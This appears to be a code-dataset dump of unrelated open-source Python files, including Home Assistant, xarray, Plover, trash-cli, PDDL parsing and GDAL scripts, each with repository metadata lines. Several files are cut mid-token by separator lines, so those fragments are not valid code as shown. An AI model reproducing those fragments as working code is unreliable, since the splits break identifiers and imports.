For example, `{"ansicolors": ["colors"]}`. Any unspecified requirements will use the
requirement name as the default module, e.g. "Django" will default to
`modules=["django"]`.
"""
req_file_tgt = self._parse_context.create_object(
TargetGeneratorSourcesHelperTarget.alias,
name=source.replace(os.path.sep, "_"),
sources=[source],
)
requirements_dep = f":{req_file_tgt.name}"
normalized_module_mapping = normalize_module_mapping(module_mapping)
normalized_type_stubs_module_mapping = normalize_module_mapping(type_stubs_module_mapping)
dependencies_overrides = flatten_overrides_to_dependency_field(
overrides, macro_name="python_requirements", build_file_dir=self._parse_context.rel_path
)
requirements = parse_pyproject_toml(
PyProjectToml.deprecated_macro_create(self._parse_context, source)
)
for parsed_req in requirements:
normalized_proj_name = canonicalize_project_name(parsed_req.project_name)
self._parse_context.create_object(
"python_requirement",
name=parsed_req.project_name,
requirements=[parsed_req],
modules=normalized_module_mapping.get(normalized_proj_name),
type_stub_modules=normalized_type_stubs_module_mapping.get(normalized_proj_name),
dependencies=[
requirements_dep,
*dependencies_overrides.get(normalized_proj_name, []),
],
)
|
jamespcole/home-assistant
|
homeassistant/components/googlehome/__init__.py
|
Python
|
apache-2.0
| 3,612
| 0
|
"""Support Google Home units."""
import logging
import asyncio
import voluptuous as vol
from homeassistant.const import CONF_DEVICES, CONF_HOST
from homeassistant.helpers import discovery
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.aiohttp_client import async_get_clientsession
_LOGGER = logging.getLogger(__name__)
REQUIREMENTS = ['googledevices==1.0.2']
DOMAIN = 'googlehome'
CLIENT = 'googlehome_client'
NAME = 'GoogleHome'
CONF_DEVICE_TYPES = 'device_types'
CONF_RSSI_THRESHOLD = 'rssi_threshold'
CONF_TRACK_ALARMS = 'track_alarms'
CONF_TRACK_DEVICES = 'track_devices'
DEVICE_TYPES = [1, 2, 3]
DEFAULT_RSSI_THRESHOLD = -70
DEVICE_CONFIG = vol.Schema({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_DEVICE_TYPES, default=DEVICE_TYPES):
vol.All(cv.ensure_list, [vol.In(DEVICE_TYPES)]),
vol.Optional(CONF_RSSI_THRESHOLD, default=DEFAULT_RSSI_THRESHOLD):
vol.Coerce(int),
vol.Optional(CONF_TRACK_ALARMS, default=False): cv.boolean,
vol.Optional(CONF_TRACK_DEVICES, default=True): cv.boolean,
})
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_DEVICES): vol.All(cv.ensure_list, [DEVICE_CONFIG]),
}),
}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass, config):
"""Set up the Google Home component."""
hass.data[DOMAIN] = {}
hass.data[CLIENT] = GoogleHomeClient(hass)
for device in config[DOMAIN][CONF_DEVICES]:
hass.data[DOMAIN][device['host']] = {}
if device[CONF_TRACK_DEVICES]:
|
hass.async_create_task(
discovery.async_load_platform(
hass, 'device_tracker', DOMAIN, device, config))
if device[CONF_TRACK_ALARMS]:
hass.async_create_task(
discovery.async_load_platform(
hass, 'sensor', DOMAIN, device, config))
return True
class GoogleHomeClient:
"""Handle all communication with the Google Home unit."""
def __init__(self, hass):
"""Initialize the
|
Google Home Client."""
self.hass = hass
self._connected = None
async def update_info(self, host):
"""Update data from Google Home."""
from googledevices.api.connect import Cast
_LOGGER.debug("Updating Google Home info for %s", host)
session = async_get_clientsession(self.hass)
device_info = await Cast(host, self.hass.loop, session).info()
device_info_data = await device_info.get_device_info()
self._connected = bool(device_info_data)
self.hass.data[DOMAIN][host]['info'] = device_info_data
async def update_bluetooth(self, host):
"""Update bluetooth from Google Home."""
from googledevices.api.connect import Cast
_LOGGER.debug("Updating Google Home bluetooth for %s", host)
session = async_get_clientsession(self.hass)
bluetooth = await Cast(host, self.hass.loop, session).bluetooth()
await bluetooth.scan_for_devices()
await asyncio.sleep(5)
bluetooth_data = await bluetooth.get_scan_result()
self.hass.data[DOMAIN][host]['bluetooth'] = bluetooth_data
async def update_alarms(self, host):
"""Update alarms from Google Home."""
from googledevices.api.connect import Cast
_LOGGER.debug("Updating Google Home bluetooth for %s", host)
session = async_get_clientsession(self.hass)
assistant = await Cast(host, self.hass.loop, session).assistant()
alarms_data = await assistant.get_alarms()
self.hass.data[DOMAIN][host]['alarms'] = alarms_data
|
Azure/azure-sdk-for-python
|
sdk/agfood/azure-mgmt-agfood/azure/mgmt/agfood/aio/__init__.py
|
Python
|
mit
| 588
| 0.003401
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause i
|
ncorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._azure_ag_food_platform_rp_service import AzureAgFoodP
|
latformRPService
__all__ = ['AzureAgFoodPlatformRPService']
|
ocwc/ocwc-data
|
search/data/management/commands/courses.py
|
Python
|
apache-2.0
| 3,372
| 0.005635
|
# -*- coding: utf-8 -*-
from optparse import make_option
from django.core.management.base import BaseCommand
from messytables import XLSTableSet, headers_guess, headers_processor, offset_processor
from data.models import Source, Course, MerlotCategory
class Command(BaseCommand):
help = "Utilities to merge our database with MERLOT"
args = "--file"
option_list = BaseCommand.option_list + (
make_option("--file", action="store", dest="filename", help="Source filename"),
make_option("--source", action="store", dest="source_id", help="Source ID"),
make_option("--provider", action="store", dest="provider_tag", help="Provider Tag"),
)
def handle(self, *args, **options):
if options.get('filename'):
self.ku_openlearning(options.get('filename'), options.get('source_id'))
def ku_openlearning(self, filename, source_id):
CATEGORY_MAPPING = {
'Assessment of learning': 2298, #Assessment,
'Finance': 2235,
'Public Service': 'Criminal Justice',
'
|
Health Science': 'Health Sciences',
'Management': 2248,
'Online Instruction': 'Hybrid and Online Course Development',
'Early Childhood': ['Career Counseling and Services', 'Childhood and Adolescence'],
'Law, Legal': 'Law',
'Psychology': 'Psychology',
'Customer Service': 2246,
'Communications': 'Communications
|
',
'Professionalism': 'Personal Development'
}
source = Source.objects.get(pk=source_id)
fh = open(filename, 'rb')
table_set = XLSTableSet(fh)
row_set = table_set.tables[0]
offset, headers = headers_guess(row_set.sample)
row_set.register_processor(headers_processor(headers))
row_set.register_processor(offset_processor(offset + 1))
for row in row_set:
url = row[0].value
title = row[1].value
description = row[2].value
# language = row[4].value
# material_type = row[5].value
license = row[6].value
categories = row[7].value
keywords = row[8].value
# audience = row[9].value
course, is_created = Course.objects.get_or_create(
linkurl = url,
provider = source.provider,
source = source,
defaults = {
'title': title,
'description': description,
'tags': keywords,
'language': 'English',
'license': license,
'content_medium': 'text',
'creative_commons': 'Yes',
'creative_commons_commercial': 'No',
'creative_commons_derivatives': 'No'
}
)
merlot_cat = CATEGORY_MAPPING[categories]
if type(merlot_cat) != list:
merlot_cat = [merlot_cat,]
for item in merlot_cat:
try:
m = MerlotCategory.objects.get(merlot_id=item)
course.merlot_categories.add(m)
except ValueError:
m = MerlotCategory.objects.get(name=item)
course.merlot_categories.add(m)
|
MBoustani/Geothon
|
Spatial Analyst Tools/zonal_statistics.py
|
Python
|
apache-2.0
| 2,677
| 0.007471
|
#!/usr/bin/env python
'''
Project:
|
Geothon (https://github.com/MBoustani/Geothon)
File: Vector/zonal_statistics.py
Description: This code calculates statistics of GeoTIFF with polygon Shapefile
Author: Maziyar Boustani (github.com/MBoustani)
'''
import numpy as n
|
p
try:
import ogr
except ImportError:
from osgeo import ogr
try:
import gdal
except ImportError:
from osgeo import gdal
from gdalconst import GA_ReadOnly
gtif_file = "/path/to/tif"
gtif_dataset = gdal.Open(gtif_file, GA_ReadOnly)
shp_file = '/path/to/shp'
driver = ogr.GetDriverByName('ESRI Shapefile')
shp_datasource = driver.Open(shp_file)
#layer_num = shp_datasource.GetLayerCount()
layer = shp_datasource.GetLayer()
transform = gtif_dataset.GetGeoTransform()
xOrigin = transform[0]
yOrigin = transform[3]
pixelWidth = transform[1]
pixelHeight = transform[5]
features_number = layer.GetFeatureCount()
f=open('table.txt','w')
f.write('ID, mean\n')
for each_feature in range(features_number):
feature = layer.GetFeature(each_feature)
feature_geom = feature.GetGeometryRef()
pointsX = []
pointsY = []
feature_geom_type = feature_geom.GetGeometryName()
#we need to get points from each feature
# so if it is Multipolygon we should get polygon
# first, ring from polygon after and points data
# from ring geometry
if (feature_geom_type == 'MULTIPOLYGON'):
num_geoms = feature_geom.GetGeometryCount()
for geom in range(num_geoms):
geomInner = feature_geom.GetGeometryRef(geom)
ring = geomInner.GetGeometryRef(0)
elif (feature_geom_type == 'POLYGON'):
ring = feature_geom.GetGeometryRef(0)
else:
sys.exit("ERROR: Feature geometry needs to be either Polygon or Multipolygon")
numpoints = ring.GetPointCount()
for point in range(numpoints):
lon, lat, z = ring.GetPoint(point)
pointsX.append(lon)
pointsY.append(lat)
#calculate feature spatial extent
xmin = min(pointsX)
xmax = max(pointsX)
ymin = min(pointsY)
ymax = max(pointsY)
#get feature ID (first column in shapefile attribute table)
ID = feature.GetFieldAsInteger(1)
xoff = int((xmin - xOrigin)/pixelWidth)
yoff = int((yOrigin - ymax)/pixelWidth)
xcount = int((xmax - xmin)/pixelWidth)+1
ycount = int((ymax - ymin)/pixelWidth)+1
banddataraster = gtif_dataset.GetRasterBand(1)
if xoff < 0:
xoff = 0
if yoff< 0:
yoff =0
dataraster = banddataraster.ReadAsArray(xoff, yoff, xcount, ycount)#.astype(np.float)
mean = np.mean(dataraster)
f.write('{0}, {1}\n'.format(ID, mean))
|
HaseloffLab/PartsDB
|
partsdb/tools/CoordinateMapper/testCoordinateMapper.py
|
Python
|
mit
| 13,945
| 0.001004
|
#!/usr/bin/python
from functools import wraps
import unittest
from CoordinateMapper import CoordinateMapper
from MapPositions import GenomePositionError
from MapPositions import ProteinPositionError
from MapPositions import CDSPosition, CDSPositionError
from SeqFeature import FeatureLocation, SeqFeature
from Bio.SeqRecord import SeqRecord
exons = [(5808, 5860), (6757, 6874), (7767, 7912), (13709, 13785)]
cmap = CoordinateMapper(exons)
g_exons = xrange(7868, 7875) # len 7
c_exons = xrange(270, 279) # len 9
p_exons = xrange(90, 93) # len 3
p_exons_trip = [p for p in p_exons for n in range(3)] # len 9
c_exon_prs = ((270, 272), (273, 275), (276, 278)) # len 3
g_exon_prs = ((7868, 7870), (7871, 7873), (7874, 7876)) # len 3
g_introns = {None: (5860, 5861, 6308, 6309, 6755, 6756),
'HGVS': (5861, 5862, 6309, 6310, 6756, 6757)}
c_introns = {None: ('51+1', '51+2', '51+449', '52-448', '52-2', '52-1'),
'HGVS': ('52+1', '52+2', '52+449', '53-448', '53-2', '53-1')}
c_intron_tups = ((51, 1), (51, 2), (51, 449), (52, -448), (52, -2), (52, -1))
g_outside = {None: (0, 13785, 14000), 'HGVS': (1, 13786, 14001)}
c_outside = {None: ('-5808', '+1', '+216'), 'HGVS': ('-5808', '*1', '*216')}
c_outside_tups = ((None, -5808), (None, 1), (None, 216))
def two_dialects(fn):
@wraps(fn)
def call_tests(self):
orig_dialect = self.dialect
for dialect in (None, 'HGVS'):
self.dialect = dialect
fn(self)
self.dialect = orig_dialect
return call_tests
class TestCDSPosition(unittest.TestCase):
"""Test that CDSPosition works properly"""
def setUp(self):
self.dialect = None
@two_dialects
def testGoodIntron(self):
"""CDSPosition should match good intron values"""
for c_args, c in zip(c_intron_tups, c_introns[self.dialect]):
actual = CDSPosition.from_anchor(*c_args).to(self.dialect)
self.assertEqual(
|
actual, c)
@two_dialects
def testGoodOutside(self):
"""CDSPosition should match good outside-CDS values"""
for c_args, c in zip(c_outside_tups, c_outside[self.dialect]):
actual = CDSPosition.from_anchor(*c_args).to(self.dialect)
self.assertEqual(actual, c)
def testEqual(sel
|
f):
"""CDSPosition should test equal with same args"""
for args in c_intron_tups:
CPos = CDSPosition.from_anchor
self.assertEqual(CPos(*args), CPos(*args))
self.assertEqual(str(CPos(*args)), str(CPos(*args)))
#def testEqualDialects(self):
#for c_pos in c_outside:
#self.assertEqual(CDSPosition(c_pos), CDSPosition.from_hgvs(c_pos))
#self.assertEqual(c_pos, CDSPosition.from_hgvs(c_pos).to_hgvs())
def testBadAnchor(self):
"""CDSPosition should fail with negative CDS anchor"""
self.assertRaises(CDSPositionError, CDSPosition.from_anchor, -1, 1)
def testBadOffset(self):
"""CDSPosition should fail with zero offset"""
self.assertRaises(CDSPositionError, CDSPosition.from_anchor, None, 0)
def testValidate(self):
"""Setting CDSPosition anchor offset should fail for invalid cases"""
intron = CDSPosition("22+4")
self.assertRaises(CDSPositionError, setattr, intron, "offset", 0)
self.assertRaises(CDSPositionError, setattr, intron, "anchor", -5)
exon = CDSPosition("60")
self.assertRaises(CDSPositionError, setattr, exon, "anchor", None)
class TestCoordinateMapper(unittest.TestCase):
"""Test that CoordinateMapper works properly"""
def setUp(self):
self.sf = SeqFeature(sum((FeatureLocation(s, e) for s, e in exons)),
type="CDS")
def testListInit(self):
"""CoordinateMapper should take list of exon pairs"""
cm = CoordinateMapper(exons)
# FIXME CompoundLocation does not have __eq__
self.assertEqual(str(cm.exons), str(self.sf.location))
def testSeqRecordInit(self):
"""CoordinateMapper should use first CDS feature of SeqRecord"""
sr = SeqRecord("", features=[self.sf])
cm = CoordinateMapper(sr)
self.assertEqual(str(cm.exons), str(self.sf.location))
def testSeqFeatureInit(self):
"""CoordinateMapper should take a CDS SeqFeature"""
cm = CoordinateMapper(self.sf)
self.assertEqual(str(cm.exons), str(self.sf.location))
def testEmptyInit(self):
"""CoordinateMapper should fail with no arguments"""
self.assertRaises(Exception, CoordinateMapper)
class Testg2c(unittest.TestCase):
"""Test success of good input and failure of bad input to g2c"""
def setUp(self):
self.dialect = None
# what it should do
# any integer should return
def testGoodExons(self):
"""g2c should work for exon positions"""
for arg, expected in zip(g_exons, c_exons):
self.assertEqual(cmap.g2c(arg), expected)
@two_dialects
def testGoodIntronsStr(self):
"""g2c should work for intron positions (string)"""
dia = self.dialect
for arg, expect in zip(g_introns[dia], c_introns[dia]):
actual = cmap.g2c(arg, dia).to(dia)
self.assertEqual(actual, expect)
@two_dialects
def testGoodIntrons(self):
"""g2c should work for intron positions (CDSPosition)"""
for arg, tup in zip(g_introns[self.dialect], c_intron_tups):
actual = cmap.g2c(arg, self.dialect)
expect = CDSPosition.from_anchor(*tup)
self.assertEqual(actual, expect)
self.assertEqual(str(actual), str(expect))
@two_dialects
def testGoodOutsideStr(self):
"""g2c should work for outside positions (string)"""
dia = self.dialect
for arg, expected in zip(g_outside[dia], c_outside[dia]):
actual = cmap.g2c(arg, dia).to(dia)
self.assertEqual(actual, expected)
def testGoodOutside(self):
"""g2c should work for outside positions (CDSPosition)"""
for arg, tup in zip(g_outside[self.dialect], c_outside_tups):
actual = cmap.g2c(arg)
expect = CDSPosition.from_anchor(*tup)
self.assertEqual(actual, expect)
self.assertEqual(str(actual), str(expect))
# what it shouldn't do
# should it handle non-exact positions?
@two_dialects
def testZeroArg(self):
"""g2c should work for 0 in no dialect and fail for 1-index"""
args = (0, self.dialect)
if self.dialect is None:
cmap.g2c(*args)
else:
self.assertRaises(GenomePositionError, cmap.g2c, *args)
@two_dialects
def testBadArg(self):
"""g2c should fail on string, float, None, or negative"""
bad = ("string", None, 3.14, -5)
for arg in bad:
self.assertRaises(Exception, cmap.g2c, arg)
#self.assertRaises(GenomePositionError, cmap.g2c, -5)
class Testc2p(unittest.TestCase):
"""Test success of good input and failure of bad input to c2p"""
# what it should do
# integer within length of exon should return correct protein
def testGoodExons(self):
"""c2p should work for exon positions"""
for arg, expect in zip(c_exons, p_exons_trip):
self.assertEqual(cmap.c2p(arg), expect)
# FIXME should CDSPosition return None or raise error?
def testBadNotProtein(self):
"""c2p should fail for CDSPosition or str"""
bad = ("string", CDSPosition.from_anchor(7, -5))
for arg in bad:
self.assertRaises(ValueError, cmap.c2p, arg)
class Testp2c(unittest.TestCase):
"""Test success of good input and failure of bad input to p2c"""
# what it should do
# integer within length of protein should return correct range
def testGoodExons(self):
"""p2c should work for exon positions"""
#for arg, expect in p2c_exons.iteritems():
for arg, expect in zip(p_exons, c_exon_prs):
self.assertEqual(cmap.p2c(arg), expect)
def testBadTooLarge(self):
"""p2c should fail for positions longer than the max length"""
self.a
|
miquelramirez/lwaptk-v2
|
external/fd/pddl/conditions.py
|
Python
|
gpl-3.0
| 13,297
| 0.007596
|
from __future__ import print_function
from . import pddl_types
def parse_condition(alist):
condition = parse_condition_aux(alist, False)
# TODO: The next line doesn't appear to do anything good,
# since uniquify_variables doesn't modify the condition in place.
# Conditions in actions or axioms are uniquified elsewhere, but
# it looks like goal conditions are never uniquified at all
# (which would be a bug).
condition.uniquify_variables({})
return condition
def parse_condition_aux(alist, negated):
"""Parse a PDDL condition. The condition is translated into NNF on the fly."""
tag = alist[0]
if tag in ("and", "or", "not", "imply"):
args = alist[1:]
if tag == "imply":
assert len(args) == 2
if tag == "not":
assert len(args) == 1
return parse_condition_aux(args[0], not negated)
elif tag in ("forall", "exists"):
parameters = pddl_types.parse_typed_list(alist[1])
args = alist[2:]
assert len(args) == 1
elif negated:
return NegatedAtom(alist[0], alist[1:])
else:
return Atom(alist[0], alist[1:])
if tag == "imply":
parts = [parse_condition_aux(args[0], not negated),
parse_condition_aux(args[1], negated)]
tag = "or"
else:
parts = [parse_condition_aux(part, negated) for part in args]
if tag == "and" and not negated or tag == "or" and negated:
return Conjunction(parts)
elif tag == "or" and not negated or tag == "and" and negated:
return Disjunction(parts)
elif tag == "forall" and not negated or tag == "exists" and negated:
return UniversalCondition(parameters, parts)
elif tag == "exists" and not negated or tag == "forall" and negated:
return ExistentialCondition(parameters, parts)
def parse_literal(alist):
if alist[0] == "not":
assert len(alist) == 2
alist = alist[1]
return NegatedAtom(alist[0], alist[1:])
else:
return Atom(alist[0], alist[1:])
# Conditions (of any type) are immutable, because they need to
# be hashed occasionally. Immutability also allows more efficient comparison
# based on a precomputed hash value.
#
# Careful: Most other classes (e.g. Effects, Axioms, Actions) are not!
class Condition(object):
def __init__(self, parts):
self.parts = tuple(parts)
self.hash = hash((self.__class__, self.parts))
def __hash__(self):
return self.hash
def __ne__(self, other):
return not self == other
def __lt__(self, other):
return self.hash < other.hash
def __le__(self, other):
return self.hash <= other.hash
def dump(self, indent=" "):
print("%s%s" % (indent, self._dump()))
for part in self.parts:
part.dump(indent + " ")
def _dump(self):
return self.__class__.__name__
def _postorder_visit(self, method_name, *args):
part_results = [part._postorder_visit(method_name, *args)
for part in self.parts]
method = getattr(self, method_name, self._propagate)
return method(part_results, *args)
def _propagate(self, parts, *args):
return self.change_parts(parts)
def simplified(self):
return self._postorder_visit("_simplified")
def relaxed(self):
return self._postorder_visit("_relaxed")
def untyped(self):
return self._postorder_visit("_untyped")
def uniquify_variables(self, type_map, renamings={}):
# Cannot used _postorder_visit because this requires preorder
# for quantified effects.
if not self.parts:
return self
else:
return self.__class__([part.uniquify_variables(type_map, renamings)
for part in self.parts])
def to_untyped_strips(self):
raise ValueError("Not a STRIPS condition: %s" % self.__class__.__name__)
def instantiate(self, var_mapping, init_facts, fluent_facts, result):
raise ValueError("Cannot instantiate condition: not normalized")
def free_variables(self):
result = set()
for part in self.parts:
result |= part.free_variables()
return result
def has_disjunction(self):
for part in self.parts:
if part.has_disjunction():
return True
return False
def has_existential_part(self):
for part in self.parts:
if part.has_existential_part():
return True
return False
def has_universal_part(self):
for part in self.parts:
if part.has_universal_part():
return True
return False
class ConstantCondition(Condition):
# Defining __eq__ blocks inheritance of __hash__, so must set it explicitly.
__hash__ = Condition.__hash__
parts = ()
def __init__(self):
self.hash = hash(self.__class__)
def change_parts(self, parts):
return self
def __eq__(self, other):
return self.__class__ is other.__class__
class Impossible(Exception):
pass
class Falsity(ConstantCondition):
def instantiate(self, var_mapping, init_facts, fluent_facts, result):
raise Impossible()
d
|
ef negate(self):
|
return Truth()
class Truth(ConstantCondition):
def to_untyped_strips(self):
return []
def instantiate(self, var_mapping, init_facts, fluent_facts, result):
pass
def negate(self):
return Falsity()
class JunctorCondition(Condition):
# Defining __eq__ blocks inheritance of __hash__, so must set it explicitly.
__hash__ = Condition.__hash__
def __eq__(self, other):
# Compare hash first for speed reasons.
return (self.hash == other.hash and
self.__class__ is other.__class__ and
self.parts == other.parts)
def change_parts(self, parts):
return self.__class__(parts)
class Conjunction(JunctorCondition):
def _simplified(self, parts):
result_parts = []
for part in parts:
if isinstance(part, Conjunction):
result_parts += part.parts
elif isinstance(part, Falsity):
return Falsity()
elif not isinstance(part, Truth):
result_parts.append(part)
if not result_parts:
return Truth()
if len(result_parts) == 1:
return result_parts[0]
return Conjunction(result_parts)
def to_untyped_strips(self):
result = []
for part in self.parts:
result += part.to_untyped_strips()
return result
def instantiate(self, var_mapping, init_facts, fluent_facts, result):
assert not result, "Condition not simplified"
for part in self.parts:
part.instantiate(var_mapping, init_facts, fluent_facts, result)
def negate(self):
return Disjunction([p.negate() for p in self.parts])
class Disjunction(JunctorCondition):
def _simplified(self, parts):
result_parts = []
for part in parts:
if isinstance(part, Disjunction):
result_parts += part.parts
elif isinstance(part, Truth):
return Truth()
elif not isinstance(part, Falsity):
result_parts.append(part)
if not result_parts:
return Falsity()
if len(result_parts) == 1:
return result_parts[0]
return Disjunction(result_parts)
def negate(self):
return Conjunction([p.negate() for p in self.parts])
def has_disjunction(self):
return True
class QuantifiedCondition(Condition):
# Defining __eq__ blocks inheritance of __hash__, so must set it explicitly.
__hash__ = Condition.__hash__
def __init__(self, parameters, parts):
self.parameters = tuple(parameters)
self.parts = tuple(parts)
self.hash = hash((self.__class__, self.parameters, self.parts))
def __eq__(self, other):
# Compare hash first for speed reasons.
return (self.hash == other.hash and
self.__class__ is othe
|
lmazuel/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/v2015_06_15/models/virtual_network_paged.py
|
Python
|
mit
| 962
| 0.00104
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under
|
the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# ------------------------------------------------------
|
--------------------
from msrest.paging import Paged
class VirtualNetworkPaged(Paged):
"""
A paging container for iterating over a list of :class:`VirtualNetwork <azure.mgmt.network.v2015_06_15.models.VirtualNetwork>` object
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[VirtualNetwork]'}
}
def __init__(self, *args, **kwargs):
super(VirtualNetworkPaged, self).__init__(*args, **kwargs)
|
nimble0/plover
|
plover/oslayer/processlock.py
|
Python
|
gpl-2.0
| 2,400
| 0.002083
|
# Copyright (c) 2012 Hesky Fisher
# See LICENSE.txt for details.
#
# processlock.py - Cross platform global lock to ensure plover only runs once.
"""Global lock to ensure plover only runs once."""
import sys
class LockNotAcquiredException(Exception):
pass
if sys.platform.startswith('win32'):
from ctypes import windll
class PloverLock:
# A GUID from http://createguid.com/
guid = 'plover_{F8C06652-2C51-410B-8D15-C94DF96FC1F9}'
def __init__(self):
pass
def acquire(self):
self.mutex = windll.kernel32.CreateMutexA(None, False, self.guid)
if windll.kernel32.GetLastError() == 0xB7: # ERROR_ALREADY_EXISTS
raise LockNotAcquiredException()
def release(self):
if hasattr(self, 'mutex'):
windll.kernel32.CloseHandle(self.mutex)
del self.mutex
def __del__(self):
self.release()
def __enter__(self):
self.acquire()
def __exit__(self, type, value, traceback):
self.release()
else:
import fcntl
import os
class PloverLock:
def __init__(self):
# Check the environment for items to make the lockfile unique
# fallback if not found
if 'DISPLAY' in os.environ:
display = os.environ['DISPLAY'][-1:]
else:
display = "0"
if hasattr(os, "uname"):
|
hostname = os.uname()[1]
else:
import socket
hostname = socket.gethostname()
lock_file_name = os.path.expanduser(
'~/.plover-lock-%s-%s' % (hostname, display))
self.fd = open(lock_file_name, 'w')
def acquire(self):
try:
fcntl.flock(self.fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
exc
|
ept IOError as e:
raise LockNotAcquiredException(str(e))
def release(self):
try:
fcntl.flock(self.fd, fcntl.LOCK_UN)
except:
pass
def __del__(self):
self.release()
try:
self.fd.close()
except:
pass
def __enter__(self):
self.acquire()
def __exit__(self, exc_type, exc_value, traceback):
self.release()
|
sein-tao/trash-cli
|
unit_tests/test_storing_paths.py
|
Python
|
gpl-2.0
| 1,446
| 0.009682
|
from trashcli.put import TrashDirectoryForPut
from nose.tools import assert_equals
from mock import Mock
class TestHowOriginalLocationIsStored:
def test_for_absolute_paths(self):
fs = Mock()
self.dir = TrashDirectoryForPut('/volume/.Trash', '/volume', fs = fs)
self.dir.store_absolute_paths()
self.assert_path_for_trashinfo_is('/file' , '/file')
self.assert_path_for_trashinfo_is('/file' , '/dir/../file')
self.assert_path_for_trashinfo_is('/outside/file' , '/outside/file')
self.assert_path_for_trashinfo_is('/volume/file' , '/volume/file')
self.assert_path_for_trashinfo_is('/volume/dir/file' , '/volume/dir/file')
def test_for_relative_paths(self):
self.dir = TrashDirectoryForPut('/volume/.Trash', '/volume')
self.dir.s
|
tore_relative_paths()
self.assert_path_for_trashinfo_is('/file' , '/file')
self.assert_path_for_trashinfo_is('/file' , '/d
|
ir/../file')
self.assert_path_for_trashinfo_is('/outside/file' , '/outside/file')
self.assert_path_for_trashinfo_is('file' , '/volume/file')
self.assert_path_for_trashinfo_is('dir/file' , '/volume/dir/file')
def assert_path_for_trashinfo_is(self, expected_value, file_to_be_trashed):
result = self.dir.path_for_trash_info.for_file(file_to_be_trashed)
assert_equals(expected_value, result)
|
drewokane/xray
|
xarray/backends/common.py
|
Python
|
apache-2.0
| 7,619
| 0.000263
|
import numpy as np
import itertools
import logging
import time
import traceback
from collections import Mapping
from ..conventions import cf_encoder
from ..core.utils import FrozenOrderedDict
from ..core.pycompat import iteritems, dask_array_type, OrderedDict
# Create a logger object, but don't add any handlers. Leave that to user code.
logger = logging.getLogger(__name__)
NONE_VAR_NAME = '__values__'
def _encode_variable_name(name):
if name is None:
name = NONE_VAR_NAME
return name
def _decode_variable_name(name):
if name == NONE_VAR_NAME:
name = None
return name
def is_trivial_index(var):
"""
Determines if in index is 'trivial' meaning that it is
equivalent to np.arange(). This is determined by
checking if there are any attributes or encodings,
if ndims is one, dtype is int and finally by comparing
the actual values to np.arange()
"""
# if either attributes or encodings are defined
# the index is not trival.
if len(var.attrs) or len(var.encoding):
return False
# if the index is not a 1d integer array
if var.ndim > 1 or not var.dtype.kind == 'i':
return False
arange = np.arange(var.size, dtype=var.dtype)
return np.all(var.values == arange)
def robust_getitem(array, key, catch=Exception, max_retries=6,
initial_delay=500):
"""
Robustly index an array, using retry logic with exponential backoff if any
of the errors ``catch`` are raised. The initial_delay is measured in ms.
With the default settings, the maximum delay will be in the range of 32-64
seconds.
"""
assert max_retries >= 0
for n in range(max_retries + 1):
try:
return array[key]
except catch:
if n == max_retries:
raise
base_delay = initial_delay * 2 ** n
next_delay = base_delay + np.random.randint(base_delay)
msg = ('getitem failed, waiting %s ms before trying again '
'(%s tries remaining). Full traceback: %s' %
(next_delay, max_retries - n, traceback.format_exc()))
logger.debug(msg)
time.sleep(1e-3 * next_delay)
class AbstractDataStore(Mapping):
def __iter__(self):
return iter(self.variables)
def __getitem__(self, key):
return self.variables[key]
def __len__(self):
return len(self.variables)
def get_attrs(self): # pragma: no cover
raise NotImplementedError
def get_variables(self): # pragma: no cover
raise NotImplementedError
def load(self):
"""
This loads the variables and attributes simultaneously.
A centralized loading function makes it easier to create
data stores that do automatic encoding/decoding.
For example:
class SuffixAppendingDataStore(AbstractDataStore):
def load(self):
variables, attributes = AbstractDataStore.load(self)
variables = {'%s_suffix' % k: v
for k, v in iteritems(variables)}
attributes = {'%s_suffix' % k: v
for k, v in iteritems(attributes)}
return variables, attributes
This function will be called anytime variables or attributes
are requested, so care should be taken to make sure its fast.
"""
variables = FrozenOrderedDict((_decode_variable_name(k), v)
for k, v in iteritems(self.get_variables()))
attributes = FrozenOrderedDict(self.get_attrs())
return variables, attributes
@property
def variables(self):
# Because encoding/decoding might happen which may require both the
# attributes and the variables, and because a store may be updated
# we need to load both the attributes and variables
# anytime either one is requested.
variables, _ = self.load()
return variables
@property
def attrs(self):
# Because encoding/decoding might happen which may require both the
# attributes and the variables, and because a store may be updated
# we need to load both the attributes and variables
# anytime either one is requested.
_, attributes = self.load()
return attributes
@property
def dimensions(self):
return self.get_dimensions()
def close(self):
pass
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
class ArrayWriter(object):
def __init__(self):
self.sources = []
self.targets = []
def add(self, source, target):
if isinstance(source, dask_array_type):
|
self.sources.append(source)
self.targets.append(target)
else:
target[...] = source
def sync(self):
if self.sources:
import dask.array as da
da.store(self.source
|
s, self.targets)
self.sources = []
self.targets = []
class AbstractWritableDataStore(AbstractDataStore):
def __init__(self, writer=None):
if writer is None:
writer = ArrayWriter()
self.writer = writer
def set_dimension(self, d, l): # pragma: no cover
raise NotImplementedError
def set_attribute(self, k, v): # pragma: no cover
raise NotImplementedError
def set_variable(self, k, v): # pragma: no cover
raise NotImplementedError
def sync(self):
self.writer.sync()
def store_dataset(self, dataset):
# in stores variables are all variables AND coordinates
# in xarray.Dataset variables are variables NOT coordinates,
# so here we pass the whole dataset in instead of doing
# dataset.variables
self.store(dataset, dataset.attrs)
def store(self, variables, attributes, check_encoding_set=frozenset()):
self.set_attributes(attributes)
neccesary_dims = [v.dims for v in variables.values()]
neccesary_dims = set(itertools.chain(*neccesary_dims))
# set all non-indexes and any index which is not trivial.
variables = OrderedDict((k, v) for k, v in iteritems(variables)
if not (k in neccesary_dims and
is_trivial_index(v)))
self.set_variables(variables, check_encoding_set)
